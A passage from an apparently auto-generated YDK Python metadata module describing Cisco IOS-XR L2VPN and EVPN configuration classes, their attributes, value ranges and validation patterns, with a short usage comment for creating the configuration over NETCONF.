_MetaInfoClassMember('iccp-redundancy-group', REFERENCE_LIST, 'IccpRedundancyGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup',
[], [],
''' ICCP Redundancy group
''',
'iccp_redundancy_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-redundancy-groups',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable redundancy groups
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('iccp-redundancy-groups', REFERENCE_CLASS, 'IccpRedundancyGroups' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups',
[], [],
''' List of Inter-Chassis Communication Protocol
redundancy groups
''',
'iccp_redundancy_groups',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'redundancy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database',
False,
[
_MetaInfoClassMember('bridge-domain-groups', REFERENCE_CLASS, 'BridgeDomainGroups' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups',
[], [],
''' List of bridge groups
''',
'bridge_domain_groups',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flexible-xconnect-service-table', REFERENCE_CLASS, 'FlexibleXconnectServiceTable' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable',
[], [],
''' List of Flexible XConnect Services
''',
'flexible_xconnect_service_table',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('g8032-rings', REFERENCE_CLASS, 'G8032Rings' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings',
[], [],
                ''' List of G8032 Rings
''',
'g8032_rings',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-classes', REFERENCE_CLASS, 'PseudowireClasses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses',
[], [],
''' List of pseudowire classes
''',
'pseudowire_classes',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('redundancy', REFERENCE_CLASS, 'Redundancy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy',
[], [],
''' Redundancy groups
''',
'redundancy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('xconnect-groups', REFERENCE_CLASS, 'XconnectGroups' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups',
[], [],
''' List of xconnect groups
''',
'xconnect_groups',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'database',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Pbb' : {
'meta_info' : _MetaInfoClass('L2Vpn.Pbb',
False,
[
_MetaInfoClassMember('backbone-source-mac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Backbone Source MAC
''',
'backbone_source_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.AutoDiscovery.BgpSignaling' : {
'meta_info' : _MetaInfoClass('L2Vpn.AutoDiscovery.BgpSignaling',
False,
[
_MetaInfoClassMember('mtu-mismatch-ignore', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Ignore MTU mismatch for auto-discovered
pseudowires
''',
'mtu_mismatch_ignore',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-signaling',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.AutoDiscovery' : {
'meta_info' : _MetaInfoClass('L2Vpn.AutoDiscovery',
False,
[
_MetaInfoClassMember('bgp-signaling', REFERENCE_CLASS, 'BgpSignaling' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.AutoDiscovery.BgpSignaling',
[], [],
''' Global bgp signaling attributes
''',
'bgp_signaling',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Utility.Logging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Utility.Logging',
False,
[
_MetaInfoClassMember('bridge-domain-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Bridge Domain state change logging
''',
'bridge_domain_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('nsr-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
                ''' Enable Non-Stop Routing state change logging
''',
'nsr_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire state change logging
''',
'pseudowire_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pwhe-replication-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable PW-HE Replication state change logging
''',
'pwhe_replication_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable VFI state change logging
''',
'vfi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'logging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Utility' : {
'meta_info' : _MetaInfoClass('L2Vpn.Utility',
False,
[
_MetaInfoClassMember('logging', REFERENCE_CLASS, 'Logging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Utility.Logging',
[], [],
''' L2VPN logging utility
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'utility',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib.MibInterface.Format' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib.MibInterface.Format',
False,
[
_MetaInfoClassMember('external-interface-format', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Set MIB interface name output in slash
format (/)
''',
'external_interface_format',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'format',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib.MibInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib.MibInterface',
False,
[
_MetaInfoClassMember('format', REFERENCE_CLASS, 'Format' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib.MibInterface.Format',
[], [],
''' MIB interface name output format
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mib-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib.MibPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib.MibPseudowire',
False,
[
_MetaInfoClassMember('statistics', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire statistics in MIB output
''',
'statistics',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mib-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib',
False,
[
_MetaInfoClassMember('mib-interface', REFERENCE_CLASS, 'MibInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib.MibInterface',
[], [],
''' Interface related configuration for MIB
''',
'mib_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mib-pseudowire', REFERENCE_CLASS, 'MibPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib.MibPseudowire',
[], [],
''' Pseudowire related configuration for MIB
''',
'mib_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mib',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp',
False,
[
_MetaInfoClassMember('mib', REFERENCE_CLASS, 'Mib' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib',
[], [],
''' MIB related configuration
''',
'mib',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'snmp',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn' : {
'meta_info' : _MetaInfoClass('L2Vpn',
False,
[
_MetaInfoClassMember('auto-discovery', REFERENCE_CLASS, 'AutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.AutoDiscovery',
[], [],
''' Global auto-discovery attributes
''',
'auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('capability', REFERENCE_ENUM_CLASS, 'L2VpnCapabilityModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnCapabilityModeEnum',
[], [],
''' L2VPN Capability Mode
''',
'capability',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('database', REFERENCE_CLASS, 'Database' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database',
[], [],
''' L2VPN databases
''',
'database',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable L2VPN feature
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2vpn-router-id', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Global L2VPN Router ID
''',
'l2vpn_router_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('load-balance', REFERENCE_ENUM_CLASS, 'LoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'LoadBalanceEnum',
[], [],
                ''' Enable flow load balancing on L2VPN bridges
''',
'load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mspw-description', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' MS-PW global description
''',
'mspw_description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mtu-mismatch-ignore', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Ignore MTU Mismatch for XCs
''',
'mtu_mismatch_ignore',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('neighbor', REFERENCE_CLASS, 'Neighbor' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Neighbor',
[], [],
''' L2VPN neighbor submode
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('nsr', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Non-Stop Routing
''',
'nsr',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb', REFERENCE_CLASS, 'Pbb' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Pbb',
[], [],
''' L2VPN PBB Global
''',
'pbb',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-grouping', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable PW grouping
''',
'pw_grouping',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-routing', REFERENCE_CLASS, 'PwRouting' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.PwRouting',
[], [],
''' Pseudowire-routing attributes
''',
'pw_routing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-status-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable PW status
''',
'pw_status_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pwoam-refresh', ATTRIBUTE, 'int' , None, None,
[('1', '4095')], [],
''' Configure PW OAM refresh interval
''',
'pwoam_refresh',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('snmp', REFERENCE_CLASS, 'Snmp' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp',
[], [],
''' SNMP related configuration
''',
'snmp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('tcn-propagation', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Topology change notification propagation
''',
'tcn_propagation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('utility', REFERENCE_CLASS, 'Utility' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Utility',
[], [],
''' L2VPN utilities
''',
'utility',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2vpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
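    # Root-level usage sketch, assuming the standard YDK-py CRUD workflow;
    # the provider address and credentials are illustrative placeholders:
    #
    #   from ydk.types import Empty
    #   from ydk.services import CRUDService
    #   from ydk.providers import NetconfServiceProvider
    #   from ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg import L2Vpn
    #
    #   provider = NetconfServiceProvider(address='10.0.0.1',
    #                                     username='admin', password='admin')
    #   l2vpn = L2Vpn()
    #   l2vpn.enable = Empty()        # 'enable' leaf of type Empty (see above)
    #   CRUDService().create(provider, l2vpn)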
'GenericInterfaceLists.GenericInterface.Interfaces.Interface' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists.GenericInterface.Interfaces.Interface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable interface
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists.GenericInterface.Interfaces' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists.GenericInterface.Interfaces',
False,
[
_MetaInfoClassMember('interface', REFERENCE_LIST, 'Interface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'GenericInterfaceLists.GenericInterface.Interfaces.Interface',
[], [],
''' Interface
''',
'interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists.GenericInterface' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists.GenericInterface',
False,
[
_MetaInfoClassMember('generic-interface-list-name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the interface list
''',
'generic_interface_list_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable interface list
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interfaces', REFERENCE_CLASS, 'Interfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'GenericInterfaceLists.GenericInterface.Interfaces',
[], [],
''' Interface table
''',
'interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'generic-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists',
False,
[
_MetaInfoClassMember('generic-interface', REFERENCE_LIST, 'GenericInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'GenericInterfaceLists.GenericInterface',
[], [],
''' Bridge group
''',
'generic_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'generic-interface-lists',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
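    # Generic interface lists pair a list name (length 0..32) with member
    # interfaces; both the list itself and each member expose an Empty-typed
    # 'enable' leaf, as described by the entries above.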
'Evpn.EvpnTables.EvpnTimers' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnTimers',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVPN timers
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-peering', ATTRIBUTE, 'int' , None, None,
[('0', '300')], [],
''' Global Peering timer
''',
'evpn_peering',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-recovery', ATTRIBUTE, 'int' , None, None,
[('20', '3600')], [],
''' Global Recovery timer
''',
'evpn_recovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-timers',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
                ''' Enable EVI Load Balancing
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evi-flow-label', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Flow Label based load balancing
''',
'evi_flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evi-load-balancing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs',
False,
[
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
                ''' Two-byte or four-byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'two-byte-as-or-four-byte-as',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
                ''' IPv4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ipv4-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget',
False,
[
_MetaInfoClassMember('format', REFERENCE_ENUM_CLASS, 'BgpRouteTargetFormatEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetFormatEnum',
[], [],
''' Format of the route target
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'BgpRouteTargetRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetRoleEnum',
[], [],
                ''' Role of the route target type
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('stitching', REFERENCE_ENUM_CLASS, 'BgpRouteTargetEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetEnum',
[], [],
                ''' Whether the RT is a stitching RT
''',
'stitching',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ipv4-address', REFERENCE_LIST, 'Ipv4Address' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address',
[], [],
                ''' IPv4 address
''',
'ipv4_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('two-byte-as-or-four-byte-as', REFERENCE_LIST, 'TwoByteAsOrFourByteAs' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs',
[], [],
                ''' Two-byte AS or four-byte AS
''',
'two_byte_as_or_four_byte_as',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-target',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
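    # Route-target note: 'format', 'role' and 'stitching' are list keys, so a
    # route target is unique per (format, role, stitching) tuple; its value is
    # carried by the 'ipv4-address' or 'two-byte-as-or-four-byte-as' child
    # list that matches the chosen format.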
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets',
False,
[
_MetaInfoClassMember('evpn-route-target', REFERENCE_LIST, 'EvpnRouteTarget' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget',
[], [],
''' Name of the Route Target
''',
'evpn_route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-targets',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
                ''' IPv4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
                ''' Two-byte or four-byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
                ''' Route Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery',
False,
[
